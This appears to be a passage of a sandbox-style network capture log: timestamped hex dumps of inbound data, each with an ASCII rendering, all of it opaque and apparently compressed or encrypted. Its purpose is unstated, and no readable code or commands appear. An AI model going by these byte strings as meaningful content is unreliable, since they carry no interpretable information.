                                                                  2022-07-15 01:58:20 UTC1013INData Raw: 31 f3 95 e4 cb 77 90 08 aa 73 3a df 13 3f 23 64 7b d1 ab 49 0a b5 36 df 9a b3 4f ed af c4 a8 7f cf a1 90 0e 07 5c 57 c9 90 d2 10 e1 9b 52 5b a9 0d 76 73 58 12 be 4e 78 5d cb bb 0a 86 cf 6c 1f 74 df db 5a 03 56 fe 9a ec 33 d0 fc a8 dd c5 25 9e af a1 ce 66 cb 0a e8 d2 19 0d a1 83 ab 96 b0 aa ba 7c a4 a6 98 08 c3 95 fc aa b7 80 19 aa 47 9d 27 99 5b c9 7c 2a f4 ea 72 c0 e5 4a b1 08 e6 85 6b 51 19 af a8 2c d1 3b 3a cf f2 9e f6 4a c5 11 41 97 01 2e 53 bb e5 d7 0c 2b 8d 71 48 97 42 d6 6c 97 c6 da 23 02 20 24 27 3a 2d 93 4b 1a 2e 06 bb f8 d0 d7 1d c7 e9 3e e4 12 35 b4 ff c2 55 1a f8 cc 29 15 78 31 a8 f3 84 7f 68 a7 fe 6b 63 09 ee 18 a1 4a c0 21 33 75 fe 2c 6f 59 ea 02 e6 ea 16 cc 59 97 8d ab 3e 5c 5b 51 9b 39 0a 9b 96 0e 4f e8 4d 16 b6 9f ca 3c e5 af d0 1b 6c 7e
                                                                  Data Ascii: 1ws:?#d{I6O\WR[vsXNx]ltZV3%f|G'[|*rJkQ,;:JA.S+qHBl# $':-K.>5U)x1hkcJ!3u,oYY>\[Q9OM<l~
                                                                  2022-07-15 01:58:20 UTC1017INData Raw: ad 88 c5 1f a3 20 27 89 ee d3 8e 0b 09 12 32 24 f5 ae 1d 8e ba db a9 a7 b3 a8 5c 3e bf 74 66 1d 88 53 e0 ae 50 9e dd ff 16 29 b1 2d 18 ee 5a ce b5 b2 fb 1b 93 c8 c6 58 bb 7e f0 89 5a d2 68 95 e9 ec 3d fe 25 0f 65 98 9a 2a c0 be 9d d5 77 43 22 ed b1 83 52 c6 ec 54 48 cb 2f db 9c c5 f5 e4 14 9e 3d c2 16 0d 60 ba 61 46 8d f0 0d 31 09 d2 a4 50 4c 1f d9 58 52 23 49 74 b5 0e 9f a4 2f f9 00 62 17 77 50 7a 3b 03 4c 1e 7c f2 8a 0d 2a 86 4e 1e 14 5b bd 72 cf b6 74 47 6b af c9 4d 59 f2 9f 57 87 d6 3c 17 6e b6 a7 1f 90 d6 2e 39 8f b5 8f cb 25 66 ec 84 b0 38 ed 48 05 88 b8 07 ec ef aa 33 e8 c6 6e 58 dc 91 72 55 a4 89 c5 ff 55 b9 6b 5a 42 cd 2a bd ea e1 a6 f3 87 13 5c 59 b3 91 df 2a ee ad 18 d7 21 e1 74 94 f9 1d d1 f1 4f dd 30 58 55 72 e8 6c 10 fc d4 2f 6e aa 5e b1 fd
                                                                  Data Ascii: '2$\>tfSP)-ZX~Zh=%e*wC"RTH/=`aF1PLXR#It/bwPz;L|*N[rtGkMYW<n.9%f8H3nXrUUkZB*\Y*!tO0XUrl/n^
                                                                  2022-07-15 01:58:20 UTC1021INData Raw: 04 85 c1 92 86 55 89 72 24 b6 7f c0 8e 52 50 47 e1 34 13 62 af af 80 97 99 c4 ff ac 0f 08 f0 63 6f a4 72 f9 7a 66 7e a5 a3 08 1a ff 0d bf 5f 13 de a3 43 dd 98 2e 5b 1d 3e ca a0 42 37 c9 29 87 29 e2 6e 18 1a 7c 3d d4 3b 3c ff 26 e2 6b 68 41 04 a4 df a7 90 0d 68 89 56 36 a7 8e f7 87 e2 a3 b7 58 f1 ae 9d ae b3 fc bb 26 56 b6 4f 49 9c 82 d6 35 1e cd 6a 6a cc ee 34 e4 a3 b5 a7 0e 61 04 0e 6b bb a6 45 d1 7b 74 6e 56 31 41 39 86 4d 23 58 ee 84 57 f8 03 b0 72 5d 7a 05 ee 8b 18 c0 60 6e a0 2c 1b b8 de 43 80 ca c9 94 d6 7b 51 38 e0 ef 07 63 d4 f3 4b a6 0c db 67 4b fe fb 8a 84 5b 53 02 5e 6b 07 4b 49 9a b4 f9 be 9e 6d 09 78 8d d4 92 fb 80 6f d0 d5 38 34 ee 3a 52 da ab 9f 8b 16 2b 9a 8c b4 a5 60 80 fe 31 f9 27 10 75 7d a0 9e 34 b3 7d cc e6 ef 9a 07 f1 52 e7 ba 14 80
                                                                  Data Ascii: Ur$RPG4bcorzf~_C.[>B7))n|=;<&khAhV6X&VOI5jj4akE{tnV1A9M#XWr]z`n,C{Q8cKgK[S^kKImxo84:R+`1'u}4}R
                                                                  2022-07-15 01:58:20 UTC1024INData Raw: 2b 49 fd eb 90 a2 12 5e 6d b9 1d e4 68 04 35 06 e9 5c ac d1 42 74 74 05 ad 8a 4a f8 c9 77 3a 0e 09 43 70 98 8c 1f 5d dc 62 64 ce 76 b7 87 83 06 df 2d c8 2e 5f ad 73 c0 8e d2 ef 82 ca 8e f9 ff 91 57 eb 2b 93 59 d0 f0 8f 5b 03 2f a6 94 07 d6 bb 51 16 cf 92 12 e7 6c c2 b4 e3 e9 45 43 4c 47 b3 b0 25 83 ef 1c a1 dc 35 b7 f4 c9 39 b4 12 3b 82 a4 a1 67 90 df 04 45 91 c1 d3 e9 a0 f4 3e f7 f5 a5 4c 3b a0 42 13 74 d9 e0 e9 0e a8 dc 02 83 97 b3 4d 3f c2 47 97 2d 54 90 6f 23 9c b2 f4 67 fe dd f2 05 6f 65 b5 c5 ed ee 3e bc 3d ba 4b 47 e2 24 c7 6c a7 b5 e0 c7 5b 53 c0 1f 4c f7 fe 9e 5a ba 9f 1f 64 ed e8 8a 86 10 1a a5 ac 9c 4c a8 d0 4d 8c 2a 34 2b 36 be 95 55 42 b7 4b a6 04 39 89 65 af 35 c5 94 0a 0d a4 13 a2 1a a3 30 a3 60 d2 50 54 0f 77 40 c6 86 26 03 21 60 45 77 bb
                                                                  Data Ascii: +I^mh5\BttJw:Cp]bdv-._sW+Y[/QlECLG%59;gE>L;BtM?G-To#goe>=KG$l[SLZdLM*4+6UBK9e50`PTw@&!`Ew
                                                                  2022-07-15 01:58:20 UTC1028INData Raw: 62 0f 34 5f 26 3d 1f 60 2d e8 36 8e 4b a9 0c 95 41 0b 28 92 c5 8b 81 4f c5 7e fc 3a 39 97 c4 16 6f c8 e1 60 e9 e2 6c f1 47 19 3f 6e f4 8b 50 88 bb cf c2 da c3 63 a4 8a e5 64 3a 05 70 ab a5 f2 e9 a4 d8 1a 0f ed 1e cf 4d 70 3e 31 0e d4 c2 8f 61 84 4b 28 7b a3 7f 05 9c c4 c9 7c 45 dc 37 e3 be d9 8c 44 fc 37 41 b0 49 2b a6 dd 94 6c b3 59 46 27 8e 97 6a 93 3e 47 01 e1 15 30 d1 9c 91 b9 95 95 7e db 00 fc d3 fe 68 07 20 4a 66 25 2b 1b b8 7d 24 d3 e8 a7 13 a1 b0 7d 33 2f 50 07 b3 fa 24 1b cb a7 7e 6c 4b 1b db 5e ee 2e 4b 30 5a 41 ee 39 01 60 c9 e5 0c e0 a4 2e 1c 71 ba d8 70 af 4b 99 5b c9 94 ed ea 63 ca 5c 93 28 36 44 b4 16 f4 f3 08 75 b7 0a fe b3 09 3c d4 48 7e 1a 02 0c 90 52 cb ca 95 45 7e d3 6d b7 eb f6 0d c5 a8 43 f4 06 1d 4a d5 b4 a4 62 d9 43 73 81 3d e9 b6
                                                                  Data Ascii: b4_&=`-6KA(O~:9o`lG?nPcd:pMp>1aK({|E7D7AI+lYF'j>G0~h Jf%+}$}3/P$~lK^.K0ZA9`.qpK[c\(6Du<H~RE~mCJbCs=
                                                                  2022-07-15 01:58:20 UTC1033INData Raw: 9d c8 f1 d1 1a 0e c6 37 44 4e 00 38 b0 3e 9b 34 50 c4 1b ae 19 c5 ee 95 10 57 06 63 27 bb 0c 05 1c 5c de 12 a5 71 cb 7d 63 16 d4 3e 53 cb 78 f0 b0 6c 4e b4 cd d9 42 2a 61 f2 be 67 c0 99 25 c1 6b 05 20 ac 18 68 8e 83 20 11 83 b7 33 c4 ef 5f 49 8c f8 2a f8 87 1c ab 0b 2c 52 51 76 c5 60 ec e6 a1 46 d9 0e 66 02 1a f5 7b b9 e1 32 a7 29 98 b1 86 40 4e 13 65 05 04 71 f9 fb b3 e5 55 e4 1a 7a 86 1b cf b6 93 37 4a 40 ee 0e 17 9e b0 93 81 98 47 e8 b8 03 fb b4 ec 95 b0 e4 6f 7e a9 25 45 8b f8 a4 b4 b3 23 5b b8 41 5e 70 8b 53 d8 e7 9b 64 ed 30 1f b4 60 d3 47 44 0d 73 6a c5 c5 20 ec 6a 4d e9 ca f8 5a ac 36 95 13 dd e2 be c4 bf 18 a6 4d ce b7 e1 af f6 b2 17 b0 6c 0a d0 e3 ee a0 52 d4 a1 5e 4e 4b 52 6c ec c2 ea 87 71 e4 ef f3 5c 5a 22 7c 7d 06 77 be a8 c6 08 96 14 e9 25
                                                                  Data Ascii: 7DN8>4PWc'\q}c>SxlNB*ag%k h 3_I*,RQv`Ff{2)@NeqUz7J@Go~%E#[A^pSd0`GDsj jMZ6MlR^NKRlq\Z"|}w%
                                                                  2022-07-15 01:58:20 UTC1037INData Raw: 72 3a 82 0e 3d 0d bc 97 91 2a 68 52 c0 dc 21 f5 96 1f 61 65 2c 04 c8 83 f6 2b 84 b7 00 86 a5 67 19 80 b4 2a 37 b4 35 bd 3e 28 bb 2c 00 0a a7 5c 4e 0c 1e 9b df 10 fc 58 81 84 b5 6b 7e 40 8f ea bd 5b cf 1d f4 fc a7 14 93 ba 40 06 2b ed ff b8 88 fd 0b 91 43 ac 41 b4 39 3b 3a 98 8e 60 c1 32 b0 75 ba 7c ea 08 33 23 cf c1 28 e2 b1 a5 fc 64 c7 e4 2e d8 15 b7 be 0f be 6a 84 dd c7 99 1a c8 84 2d 97 d6 c2 bb bd af 48 8f 32 13 1d 50 73 9b 51 01 0e a6 25 12 54 4f 47 bd c5 c7 be 3f 1b 0d 71 32 0c 2e cc 2b 64 58 b7 fc bf ab 16 18 15 76 75 67 19 66 12 4a 57 a0 8b c0 c5 48 62 20 0b 19 ad 9d 80 72 76 91 90 73 17 46 07 d0 a3 97 2c 4b 56 13 62 e6 20 ee 29 14 ef d8 20 d9 47 06 92 c4 0f 12 aa 4f 22 71 3d 79 3d 39 62 4a ff bf 82 54 ae 64 ea 7b 05 b1 1b 0e 5f 75 ba e8 39 e8 13
                                                                  Data Ascii: r:=*hR!ae,+g*75>(,\NXk~@[@+CA9;:`2u|3#(d.j-H2PsQ%TOG?q2.+dXvugfJWHb rvsF,KVb ) GO"q=y=9bJTd{_u9
                                                                  2022-07-15 01:58:20 UTC1041INData Raw: 00 ba 90 d0 45 4c 32 4d e1 43 0a a3 a9 9c 4b e4 25 ae fe 06 bf 20 ac e5 6e 2f 94 31 ba a9 fd c6 74 bb 1d 55 07 77 99 e0 63 14 17 3b 81 3d 37 74 b0 b4 00 ef ea c1 1e 23 09 09 25 62 c3 87 b0 26 22 cd 3b bd 0b 20 7c a8 28 a4 ce e5 d7 95 3d f2 37 60 25 16 c7 ca f0 67 e6 77 52 bd 53 bb f6 cb b2 02 78 80 48 f7 07 5b a4 7a 0d a0 f1 8a c1 eb 51 9a 12 27 70 3a 1d ac cc 7b 71 23 7c 78 5b 99 1c 36 00 06 33 dc 33 81 3c f0 85 43 68 9c 13 ef e7 5c 1b e4 35 aa a7 40 8f 28 d3 89 51 04 20 e7 d4 c8 39 18 29 93 cf cc 8e ab 7e ba 8f 18 20 6d f3 13 e0 98 8a 66 c6 16 7f dc 3b 0d a7 1b cb 85 43 52 fa b1 93 8d 82 5b 3f 26 bd 49 80 5c 42 e8 f7 8a 95 c0 91 64 38 eb 34 f4 a2 51 f1 a6 83 33 6d d1 bb 74 5c 95 c5 23 62 6d 97 18 92 50 f0 3e e8 e8 2a df a8 c9 f1 00 69 dc 55 da b1 48 e1
                                                                  Data Ascii: EL2MCK% n/1tUwc;=7t#%b&"; |(=7`%gwRSxH[zQ'p:{q#|x[633<Ch\5@(Q 9)~ mf;CR[?&I\Bd84Q3mt\#bmP>*iUH
                                                                  2022-07-15 01:58:20 UTC1045INData Raw: 32 21 bd 55 ab e7 d4 e1 61 40 57 59 db d0 2f 20 ee 0b a3 8b b7 f4 23 39 61 fb a0 38 3d 66 c8 70 df 14 44 d9 4a 4e 56 93 9d 45 fc 06 88 22 90 86 5b 5a 04 c5 a8 59 d3 f2 21 62 6d 67 b5 8c d9 c5 d6 83 99 a6 eb 51 e7 9e a4 72 f4 ab 3c bd 5a 7a 9c 71 55 b3 7c 31 b5 43 4a 63 54 e4 80 33 cf e9 b8 7f 53 de 8c f4 f2 3c 1a 8a 88 ca 9d b1 1d b3 a0 f7 16 ab 88 fa a4 6c b9 56 05 68 88 37 af 1a b3 59 ba 25 62 1b a7 eb 03 68 c5 77 81 6d 60 b3 8d 08 f4 60 b1 c1 10 73 55 b6 1e 99 b0 47 d0 d0 f6 7c 0c 06 d5 7f e4 c8 2d 74 59 61 7f 8a 51 60 d8 cf ae 4b a0 5a a2 90 63 7f 79 f9 3b ae b4 c6 d2 ab 5f 45 2f d1 01 6a 74 3c a2 96 1b 1d c5 55 50 58 91 84 dd 7c 13 bd 24 96 eb a0 da 2d e8 a2 c5 d2 62 55 eb 47 1f b6 9a 68 15 a1 43 cd dc a4 8e 5e 4d 21 58 5a c7 f1 df e5 c0 1c be c0 19
                                                                  Data Ascii: 2!Ua@WY/ #9a8=fpDJNVE"[ZY!bmgQr<ZzqU|1CJcT3S<lVh7Y%bhwm``sUG|-tYaQ`KZcy;_E/jt<UPX|$-bUGhC^M!XZ
                                                                  2022-07-15 01:58:20 UTC1049INData Raw: b1 a7 27 50 38 e2 d9 13 0d fe 8f fb bb 3f 2b dc 2a 87 9e e9 1e 30 3e d1 bd 2c 22 6c c6 e8 77 56 b6 c3 b4 f0 94 32 65 c2 a6 2a 9d ed d8 52 41 df c1 d9 66 88 23 bd e6 e4 41 6f 25 ab ec 4c df cb 17 52 8d b6 40 f4 39 8c 63 4f e4 b0 16 3a 4a 08 a3 6f fe 5f 14 54 be 68 ec 06 8d f0 f4 31 4d 1d a7 52 39 c5 ba 14 cc 16 f7 37 d1 fb 9d 29 b6 64 44 1a d5 a1 82 04 df 49 76 7b 7b fe 3f 04 c2 d4 2a f6 72 aa 06 5d dc fb 93 54 95 5c 36 03 1f 65 73 ef ae e3 4f 3a 28 e3 1f b2 f9 94 5e 88 3d ee 46 b9 d2 e8 67 f3 82 85 1e ac 58 08 99 d1 50 0b 05 0d e2 15 01 47 51 04 39 30 ea 8a dd 4a 7b 5c f4 e9 c7 df 56 36 a1 55 7f 31 94 b5 95 75 51 23 d2 b4 83 20 96 85 6d fd 11 07 0a ca ba f6 d2 7f 74 4a 33 43 b7 f3 d8 22 46 bb 13 50 9e ed ba 27 7b fa ef 35 15 d6 a0 73 89 36 82 a8 11 d4 f8
                                                                  Data Ascii: 'P8?+*0>,"lwV2e*RAf#Ao%LR@9cO:Jo_Th1MR97)dDIv{{?*r]T\6esO:(^=FgXPGQ90J{\V6U1uQ# mtJ3C"FP'{5s6
                                                                  2022-07-15 01:58:20 UTC1053INData Raw: a5 fd d3 09 be 0c 9a d0 e7 bf 29 10 c0 fb 9a 74 38 2a 09 ff 37 98 5b cb 99 1d b5 86 0a 89 40 8c df c4 ab a5 f9 bc e6 69 03 15 b8 09 15 b1 bf 78 7e 1b bd c2 48 69 17 b9 cf 55 08 ab 0d 8e b0 f1 64 11 2d 7d 9a 85 93 67 01 10 e1 9f e6 9e 85 f7 a2 cd 60 0c a9 46 96 5a 6c 8a c6 de d0 5d e8 0c 7b 14 78 31 d6 b5 8c f9 1f f6 31 b3 b1 9f e7 1b 8c 5c 55 df fa 62 71 15 b6 6f 1c a2 18 01 93 b0 87 3d 65 10 55 ba 9e 14 70 16 f9 0f d0 32 45 63 21 b8 50 56 28 8e 67 b6 36 96 9e 75 8a e6 6a ab ce d1 93 34 6f 29 37 8b c0 ae d2 8b 97 52 ba d4 b4 08 94 e0 02 3c f9 26 29 ac 88 e3 f2 da 42 31 cc 40 dd 31 c2 d7 8b 6f be 89 be 1a 3e 6e e9 bc ab ab ba 78 5f 6e 8b ab 8f f0 70 7c 76 69 85 fd 55 60 6c 0a b0 13 18 2e cf f1 e1 c8 e3 f5 57 03 aa ef 12 43 68 5e f3 28 51 99 a8 a5 ab 35 e5
                                                                  Data Ascii: )t8*7[@ix~HiUd-}g`FZl]{x11\Ubqo=eUp2Ec!PV(g6uj4o)7R<&)B1@1o>nx_np|viU`l.WCh^(Q5
                                                                  2022-07-15 01:58:20 UTC1056INData Raw: 80 33 b0 3e f3 35 8c cd 66 f0 75 be 7d 08 e5 e8 39 7c e2 5b c0 33 9c 40 8c ef ea 34 d8 2a b4 b5 e2 d6 39 09 88 37 3e 9d a1 e7 a7 4d 43 6f 98 9a 85 d1 64 8a e0 c8 1b 0b 4d 93 05 4f 4e 59 a4 44 49 09 c9 25 ef e5 c0 70 f2 a5 8c f4 36 b1 e4 5c d2 1d da 8d 9e ac cc a5 2b 8c 7d ef 8d 5d 9f ab e8 27 54 95 b4 7b 61 59 8f 8d 3b 54 2e 0b ba a9 7a b8 26 fc 13 b6 c8 ef a5 45 31 93 f6 6e 31 31 90 24 fa e6 23 3d f6 4e 54 f5 05 33 1d 2f 92 2a e5 fc f1 c6 4d 7f f7 a6 42 b8 e8 36 51 58 68 44 4f 41 2c da e0 b5 66 57 1e ec 68 36 42 1a 83 00 52 90 8b 4b ce c5 63 ad 3b 0e 3c 60 42 88 cc 33 88 31 8b a3 6b 79 ff a2 f3 c1 2b 04 11 72 04 4a 34 64 71 3e 04 ca df 82 a9 d7 c6 93 75 1f e8 08 45 0a 1a 1e 3d 66 70 4d 83 04 9e cd 02 2e 68 66 4b 90 7a 20 38 05 a6 33 ee 0c a5 d0 68 17 97
                                                                  Data Ascii: 3>5fu}9|[3@4*97>MCodMONYDI%p6\+}]'T{aY;T.z&E1n11$#=NT3/*MB6QXhDOA,fWh6BRKc;<`B31ky+rJ4dq>uE=fpM.hfKz 83h
                                                                  2022-07-15 01:58:20 UTC1060INData Raw: d5 ff dc 17 06 e2 1e 41 8d 78 7b cb ed 1f cb d9 e2 a3 df c5 0d ef 8f 27 02 4f 85 fe 6f d5 8e 15 bc 04 3e 87 66 29 74 9c ec f9 1c e3 6c 3c fd 39 42 fb 49 8c 83 51 90 8e e0 a1 f2 81 67 51 59 58 51 a9 6f c6 cd 19 c0 19 0a 1d aa dc c5 1d 87 8f b9 30 83 ee a8 6b ad 42 11 bc bb 9e af 03 e9 1e d5 19 62 29 6c c8 14 67 61 f5 23 9e af 9f 77 01 9f 98 2e 69 3d 49 f6 95 af fa 27 2b 8c dc ee 0d 25 5f 02 65 85 92 aa 37 5e 7d c0 61 a9 2b ac 21 40 a5 31 aa 61 b4 43 03 41 10 44 d1 53 22 8f dc 40 e9 29 67 8c 05 c1 7a fe 54 1c 48 5d 4f f3 17 3b 50 7d ee 36 a3 32 86 c3 91 d0 b8 a5 53 03 78 0e ca 1f 92 c3 ed 65 35 28 1b e7 06 2f 51 1f f8 6c ce 65 68 4d 71 c0 a3 40 23 be 7c f2 d2 47 27 44 cd 62 91 3c 90 90 f9 cf cf cf e8 45 0d 94 1c 14 14 85 ff 8c ec 55 1c 3c 88 dc e7 be 56 15
                                                                  Data Ascii: Ax{'Oo>f)tl<9BIQgQYXQo0kBb)lga#w.i=I'+%_e7^}a+!@1aCADS"@)gzTH]O;P}62Sxe5(/QlehMq@#|G'Db<EU<V
                                                                  2022-07-15 01:58:20 UTC1065INData Raw: b8 85 53 4f db f4 af 01 28 7b 4b 2e 30 d3 0c 6c 50 16 c9 f0 b8 a5 c1 dc 76 12 23 d9 fd f9 ed 3e 2e 7f 77 06 48 76 87 c6 09 66 eb 87 a1 bf 69 11 5e 65 63 12 4b d9 c3 48 ed 32 d1 3b 38 f6 9e ff 62 3a fc 44 58 59 81 0a 34 69 3b 23 1d a5 ee 77 14 8a ea 04 b1 e8 3b 2e 6f ba 54 24 2c f7 c1 58 29 be 85 67 7f 38 6c 0a 1d 78 1b f4 30 58 c6 57 44 eb 30 97 79 4f 42 c3 83 90 4d 55 14 85 84 71 6d 5e 29 42 20 55 55 96 99 63 b1 4f b5 28 24 9d 8f ad 70 09 2f 77 8c 27 77 cb c1 76 46 2b 5b 1f 64 ef ba 47 db 5d 08 65 32 12 27 68 80 a1 af a6 ec ac ef b7 33 24 21 41 2b 27 61 ab 92 a8 e3 75 f6 93 d2 18 e7 8a cc 65 4c 57 fc 01 20 17 f3 72 e1 58 81 11 48 d2 02 d9 f4 51 28 b5 d8 23 c1 73 de 53 dc 7e 2b 0a 87 bd 68 c6 86 77 35 2a dd 59 a2 77 89 6e 36 27 a0 7c 0a 49 23 90 47 71 3b
                                                                  Data Ascii: SO({K.0lPv#>.wHvfi^ecKH2;8b:DXY4i;#w;.oT$,X)g8lx0XWD0yOBMUqm^)B UUcO($p/w'wvF+[dG]e2'h3$!A+'aueLW rXHQ(#sS~+hw5*Ywn6'|I#Gq;
                                                                  2022-07-15 01:58:20 UTC1069INData Raw: 3b ef 9f 37 b3 55 f0 56 3c 1c 0c 7b ef a5 6a d2 b7 23 61 11 eb c8 20 80 36 f7 11 d5 b6 a2 e1 1f 80 82 2a c5 3a 3b d9 df 8b 9d 4e 72 76 82 90 2f e0 c5 aa a9 5c 1c e9 8f 98 1f d3 c8 0a 6d 4c 29 54 94 65 84 9d 51 a2 fe d2 5e 78 d2 e9 70 19 ee d5 ea 98 73 c7 16 dd 5e e8 28 43 f8 8c b1 e3 2f ea 2c 8c 4b c5 00 a8 d0 4e 42 32 2c d2 f0 d2 9a 83 8a 72 ab 4b be 4a 28 1d 63 fb a2 68 4e 91 9c 89 9c ff 51 39 bd 88 b3 65 88 46 0c 01 fb bd e5 77 b4 0f 71 ba 4b 64 b0 e2 b7 05 de 6c 87 f0 db 6d d4 73 8f be 7e d8 92 e1 8c b8 50 b1 d4 db 72 0c 6e 39 d5 06 28 0a 5f 23 da 25 5d 65 2f dd 91 9e 16 6f c0 58 a1 87 bf b1 9f b2 b5 56 f9 dc a3 64 8e 8d 19 76 1f 29 dd 50 ec e1 8a 8c 66 52 ee ba 4b f6 2e 5f 04 eb f1 60 91 fc 20 f6 7f 3d 09 c7 fc aa b9 19 7a c2 98 34 76 80 7b 71 e2 1b
                                                                  Data Ascii: ;7UV<{j#a 6*:;Nrv/\mL)TeQ^xps^(C/,KNB2,rKJ(chNQ9eFwqKdlms~Prn9(_#%]e/oXVdv)PfRK._` =z4v{q
                                                                  2022-07-15 01:58:20 UTC1073INData Raw: ea 98 55 12 63 25 60 c1 30 f2 17 bd e4 8f 66 9d 5f a5 9d 4f 17 6f bc 98 5e 5d 84 14 cc e8 12 70 92 9b 11 97 a7 b4 89 78 4b 7a 5c 77 f3 ed 93 45 69 97 ef a4 87 3c 0c a6 2b 62 8f a8 4e 19 85 94 19 3c af 16 5d 90 b9 de c9 d7 d1 78 1f 08 95 05 35 6b 53 78 3b 26 e5 9f a0 0c 25 44 da 9b 82 21 fe 85 56 96 7a e5 b5 9b 39 88 ce 0e 3a 84 59 79 1e ff 7a 6b 10 fa 82 ec d4 15 53 83 7a ec d5 46 b0 3f 28 32 82 6f 80 fe b9 8d 76 85 32 b0 d8 eb 38 b5 94 77 c6 12 99 15 67 81 4e 23 6c 6d a9 1e 9b 46 01 20 b5 de c3 1f cd 9a b2 be bc af 61 31 3a 98 c9 26 df 20 a2 af 1a 63 0e 2d e9 47 0a e0 fd e8 6c 03 82 aa 66 05 10 da b9 24 5c c2 1e a8 e2 d0 00 48 a1 52 84 b5 d5 a7 69 17 e8 a7 ca af 28 46 68 55 a4 71 1c ee 3e b0 42 f9 89 88 0a 9f d0 aa 79 11 07 30 4f c2 25 02 f4 93 31 e5 8b
                                                                  Data Ascii: Uc%`0f_Oo^]pxKz\wEi<+bN<]x5kSx;&%D!Vz9:YyzkSzF?(2ov28wgN#lmF a1:& c-Glf$\HRi(FhUq>By0O%1
                                                                  2022-07-15 01:58:20 UTC1077INData Raw: c7 34 b1 36 a4 f1 55 80 22 dd 09 e4 69 ec 06 9c 3e fa 7d 9e 5b 06 52 e1 57 fa ed 2c 3c a2 c7 f4 5c bd ba 7f 09 9f 71 5c 14 a6 18 1b d4 4e cb a4 bd f5 64 16 de 40 ee 04 a4 74 d2 b3 e1 db ff e1 2c ad b0 ea b6 dd a0 49 09 f9 39 8a 86 0f ad ad 44 7f 0b bb 0a 3b bd 76 04 42 4c 53 5d 6a b7 2d 94 07 b3 ab 91 04 50 16 f2 19 6a a5 59 35 56 58 ca 4c 7c b7 c5 85 05 91 91 c1 bc e4 a5 ee c8 0f d1 de 23 7b f9 3d 17 a1 5a 7b b5 a8 48 de 32 e8 32 71 ad e1 93 d8 f8 fc dd ef 98 a8 a5 85 1b 99 7f 7a ee 0b e7 94 1e f5 ed c8 b1 56 92 c0 0d 2e 18 8d 98 63 3a 2c 5d 4d 6f e1 7e f0 c7 58 74 70 a3 0c b8 7e a0 15 83 24 21 2a 89 8c 46 6f d7 07 9a 92 c9 e1 06 7a bb aa 2a f1 c5 0e cc d6 59 75 16 5c e5 ab a3 a7 77 f8 d1 7b e3 95 d2 18 cd 56 09 83 e4 dd eb 3d 97 bc 78 6e c7 bd a6 df aa
                                                                  Data Ascii: 46U"i>}[RW,<\q\Nd@t,I9D;vBLS]j-PjY5VXL|#{=Z{H22qzV.c:,]Mo~Xtp~$!*Foz*Yu\w{V=xn
                                                                  2022-07-15 01:58:20 UTC1081INData Raw: 22 e8 af 84 14 6c 6b b6 2e ac c0 2b ad 56 c0 2f 48 5d 3e 1c de 60 f6 d3 10 1f 7e c9 e0 ed 5a f7 b3 56 ec fe fd 17 ad 49 5b 71 74 65 29 3e 34 4e 65 e5 98 68 d5 b9 dd bc 01 a3 50 2b fb 12 a0 08 3d 73 eb e7 73 af a9 1c b0 b7 8b b6 c0 1e 6f e5 56 c4 7e e7 d8 a0 9d 34 e6 5b bb 37 20 7d 24 0b 7f dc 46 37 98 14 c9 9d e1 af b5 de 57 17 88 64 0f 56 31 5a e9 48 8b d8 8d 29 c9 e7 d3 8c d8 ab da 5f d9 2f ec b4 ad 87 99 aa 93 66 ec 68 02 cc 2d f9 f5 80 14 6a 4f ff 15 56 93 53 65 f4 3b 9d 9d cc 3e e1 21 68 8e 74 0c a7 2b c5 69 ec 48 ce 13 8e b3 ed cd 62 de a9 94 15 f5 b6 19 62 d1 b3 f7 04 23 50 ef 77 17 7a 2a 1c bf e9 a4 a0 ee 28 2c bb de de dd b7 79 fc 4c d9 5a b7 30 61 39 89 16 4f c6 da 54 57 86 c7 10 cf 48 3c 72 fb 4e 37 03 0e 3f 46 28 c5 69 08 89 6d 1a b4 9d cc 80
                                                                  Data Ascii: "lk.+V/H]>`~ZVI[qte)>4NehP+=ssoV~4[7 }$F7WdV1ZH)_/fh-jOVSe;>!ht+iHbb#Pwz*(,yLZ0a9OTWH<rN7?F(im
                                                                  2022-07-15 01:58:20 UTC1085INData Raw: 07 8d ed 47 97 0c bf 5f 12 20 f6 ec 30 79 96 6d ee 09 87 03 14 7a be c8 7d 7a 23 f3 aa 48 7c 55 af d5 2b ca c7 05 21 16 a0 fd 0e dd 88 b2 5e 56 e8 a5 6e ba e6 6c e8 1b 30 42 6d 07 66 e8 78 a1 04 0e b5 86 48 ba 16 43 b8 6c 26 3f ae e4 4c aa ef 94 d8 5c e9 b1 73 84 c7 29 b4 0b cd 7f 7b 75 34 29 51 bf ec 40 e0 3e 43 ef 1f f5 83 f8 26 20 d3 eb 86 bf f9 f2 ec 4b 6d 61 01 88 19 b3 d9 dd a2 8f 6f 4f 86 4c ba 2e a9 05 36 9a 2f a9 11 c7 f6 1b 71 d5 5c e3 a1 8b d5 3e 9b 46 55 61 ff 84 0f 75 a2 e3 fb 0d 33 f3 12 25 57 9b a6 86 c6 38 b3 65 61 63 8d 15 8e 29 ad c2 cf 08 af b3 6c cb 39 5c 3d de 09 76 9b ab 30 86 9b 25 bb 66 d1 22 bd 5c 08 c1 3b 19 ab 67 26 d2 0d 98 7b 50 da 07 a3 2c f8 4c b3 9c b5 cf e7 c0 d2 4f a7 4e ab 22 38 0f a5 53 76 87 76 55 ca 56 7f 63 36 94 f3
                                                                  Data Ascii: G_ 0ymz}z#H|U+!^Vnl0BmfxHCl&?L\s){u4)Q@>C& KmaoOL.6/q\>FUau3%W8eac)l9\=v0%f"\;g&{P,LON"8SvvUVc6
                                                                  2022-07-15 01:58:20 UTC1088INData Raw: 1d 8b ce e5 da f0 71 ce 9f f7 05 d2 f6 04 a6 fe 13 3a 71 00 09 ae 90 90 d8 79 42 5a 28 df 68 20 44 8d cd ba 80 f9 33 8a 7c 6f 9d 02 33 ec 83 53 fd a1 ca 3f 3b ad f3 b2 1c c9 8a c4 ce 31 17 0c 36 fa 4c ae a1 fd 2e 0b 8e a3 41 de fa 0d 59 5b 0f b7 49 4d 2c bf 00 69 28 4b 30 6d 03 2b 88 e1 53 db 36 2f e8 34 9f 3e 4c 66 9e b3 e7 8c a8 8f 3a 9d bf 1c b7 0a 87 dc 45 8e 61 7c 76 11 77 c0 3f bc 8f e7 1b 36 ad 89 49 96 43 c0 47 c1 95 5f bb f4 26 15 21 8a 1b ba b6 de 56 2e e1 ea 69 33 a7 67 6b 54 13 3b 60 c2 1b 95 12 99 d8 c7 31 6a e6 ee f4 86 9a 5c dd fd e3 6f 47 38 a5 e8 8f 0a 7c bd cd 01 fd 2c cb 3a a6 b7 06 2a aa 7c a8 f3 c3 f0 43 b8 2f d8 f8 99 47 09 bb 84 6c ba b3 7b 1e eb ea 14 20 a2 ce 34 a1 04 0d 68 29 83 37 